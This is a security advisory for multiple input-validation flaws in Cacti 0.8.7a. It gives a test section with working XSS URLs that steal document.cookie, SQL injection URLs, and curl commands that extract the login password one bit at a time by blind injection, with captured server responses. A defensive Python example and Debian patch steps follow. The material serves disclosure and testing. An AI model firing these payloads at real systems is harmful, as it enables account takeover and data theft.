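Cacti Multiple Input Validation Vulnerabilities
Release date: 2008-02-12
Last updated: 2008-07-16
Affected systems:
Raxnet Cacti 0.8.7a
Unaffected systems:
Raxnet Cacti 0.8.7b
Description: BUGTRAQ ID: 27749
CVE(CAN) ID: CVE-2008-0786, CVE-2008-0785, CVE-2008-0784, CVE-2008-0783
Cacti is a round-robin database (RRD) tool that helps create graphs from database information and is available for several Linux distributions.
Multiple input validation errors in Cacti allow remote attackers to carry out HTTP response splitting, cross-site scripting, or SQL injection attacks.
1) Input passed to several parameters is not properly sanitized before being used in SQL queries, which allows attackers to perform SQL injection attacks.
2) Input passed to several parameters is not properly sanitized before being returned to the user, which allows attackers to inject and execute arbitrary HTML and script code in the user's browser, or to inject arbitrary HTTP headers that are included in the response sent to the user.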
<*Source: Francesco Ongaro ([email protected])
Links: http://secunia.com/advisories/28872/
http://marc.info/?l=bugtraq&m=120284658901282&w=2
http://www.debian.org/security/2008/dsa-1569
*>
Test method:
Warning
The following procedures (methods) may be offensive in nature and are provided for security research and teaching purposes only. Use at your own risk!
http://www.example.com/cacti/graph.ph ... 6#39;%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/cacti/graph_vi ... ouseover=javascript:alert(/XSS/)
http://www.example.com/cacti/index.ph ... ion=foo/%3Cscript%3Ealert('XSS')%3C/script%3E
http://www.example.com/cacti/graph_vi ... 0'1'='1
http://www.example.com/cacti/tree.php ... eaf_id=1%20or%201%20=%201
curl "http://www.example.com/cacti/graph_xp ... hp?local_graph_id=1" -d \
"local_graph_id=1'" -H "Cookie: Cacti=<cookie value>"
curl "http://www.example.com/cacti/tree.php?action=edit&id=1" -d \
"id=sql'" -H "Cookie: Cacti=<cookie value>"
curl -v "http://www.example.com/cacti/index.php/sql.php" -d \
"login_username=foo'+or+ascii(substring(password,1,1))>56#&action=login"
$ curl -v "http://www.example.com/cacti/index.php/sql.php" -d \
"login_username=foo'+or+ascii(substring(password,1,1))<56#&action=login"
* About to connect() to www.example.com port 80 (#0)
* Trying 127.0.0.1... connected
* Connected to www.example.com (127.0.0.1) port 80 (#0)
> POST /cacti-0.8.7a/index.php/sql.php HTTP/1.1
> User-Agent: curl/1.1.1 (i986-gnu-ms-bsd) cacalib/3.6.9 OpenTelnet/0.1
> Host: www.example.com
> Accept: */*
> Content-Length: 71
> Content-Type: application/x-www-form-urlencoded
>
< HTTP/1.1 200 OK
< Date: Mon, 17 Dec 2007 19:29:34 GMT
< Server: Apache
< X-Powered-By: PHP/1.2.3-linuxz
< Content-Length: 355
< Content-Type: text/html
AAAAAAAAA: SELECT * FROM user_auth WHERE username = 'foo' or
ascii(substring(password,1,1))<56#' AND password = md5('') AND realm=0
Warning: Cannot modify header information - headers already
sent by (output started at /home/x/cacti-0.8.7a/auth_login.php:126)
in /home/x/cacti-0.8.7a/auth_login.php on line 200
* Connection #0 to host www.example.com left intact
* Closing connection #0
$ curl -kis "http://www.example.com/cacti-0.8.7a/index.php/sql.php" -d \
"login_username=foo'+or+ascii(substring(password,1,1))>56#&action=login" \
| head -n1
HTTP/1.1 200 OK
$ curl -kis "http://www.example.com/cacti-0.8.7a/index.php/sql.php" -d \
"login_username=foo'+or+ascii(substring(password,1,1))<56#&action=login" \
| head -n1
HTTP/1.1 302 Found
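The three bug classes described above, handled on the defensive side. This is an added example, not Cacti's code and not the 0.8.7b patch: it shows that binding the login parameters removes the 200-versus-302 difference seen in the captured output, and that strict integer, CR/LF and HTML-escaping checks stop the other test inputs. The function names are hypothetical, and an in-memory SQLite table with a constructed account stands in for user_auth.

```python
import hashlib
import html
import re
import sqlite3

def require_int(raw: str) -> int:
    """Accept only a plain decimal id (local_graph_id, leaf_id, id)."""
    if not re.fullmatch(r"[0-9]{1,10}", raw):
        raise ValueError("non-numeric id rejected")
    return int(raw)

def header_value(raw: str) -> str:
    """Refuse CR/LF so request data cannot start a new response header."""
    if "\r" in raw or "\n" in raw:
        raise ValueError("CR/LF in header value rejected")
    return raw

def render(raw: str) -> str:
    """HTML-escape request data before echoing it into a page."""
    return html.escape(raw, quote=True)

def login(db: sqlite3.Connection, username: str, password: str) -> bool:
    """Login lookup with bound parameters; input never becomes SQL text."""
    # MD5 only mirrors the query in the captured output above.
    digest = hashlib.md5(password.encode()).hexdigest()
    row = db.execute(
        "SELECT id FROM user_auth"
        " WHERE username = ? AND password = ? AND realm = 0",
        (username, digest),
    ).fetchone()
    return row is not None

def demo_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for user_auth (assumption)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE user_auth (id INTEGER PRIMARY KEY,"
               " username TEXT, password TEXT, realm INTEGER)")
    db.execute("INSERT INTO user_auth (username, password, realm)"
               " VALUES (?, ?, 0)",
               ("admin", hashlib.md5(b"s3cret-constructed").hexdigest()))
    return db

if __name__ == "__main__":
    db = demo_db()
    for probe in ("foo' or ascii(substring(password,1,1))>56#",
                  "foo' or ascii(substring(password,1,1))<56#"):
        print(repr(probe), "->", login(db, probe, ""))  # same answer for both
    print(render("'><script>alert(document.cookie)</script>"))
```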
Recommendation: Vendor patches:
Debian
------
Debian has released a security advisory (DSA-1569-3) and corresponding patches for this issue:
DSA-1569-3: New cacti packages fix regression
Link: http://www.debian.org/security/2008/dsa-1569
Patch downloads:
Source archives:
http://security.debian.org/pool/updat ... /cacti_0.8.6i.orig.tar.gz
Size/MD5 checksum: 1122700 341b5828d95db91f81f5fbba65411d63
http://security.debian.org/pool/updat ... acti/cacti_0.8.6i-3.5.dsc
Size/MD5 checksum: 581 6184cdfb6a4e7a5372d684556aa46537
http://security.debian.org/pool/updat ... /cacti_0.8.6i-3.5.diff.gz
Size/MD5 checksum: 37154 dc53c27c1584999db93a83be1bf43879
Architecture independent packages:
http://security.debian.org/pool/updat ... /cacti_0.8.6i-3.5_all.deb
Size/MD5 checksum: 958000 f496c887950457535b223bf90988eb72
Patch installation:
1. Install the patch package manually:
First, download the patch with the following command:
# wget url (url is the patch download link)
Then, install the patch with the following command:
# dpkg -i file.deb (file is the name of the corresponding patch)
2. Install the patch package automatically with apt-get:
First, update the internal database with the following command:
# apt-get update
Then, install the updated packages with the following command:
# apt-get upgrade
Raxnet
------
The vendor has released an upgrade that fixes this security issue; download it from the vendor's home page:
http://www.cacti.net/release_notes_0_8_7b.php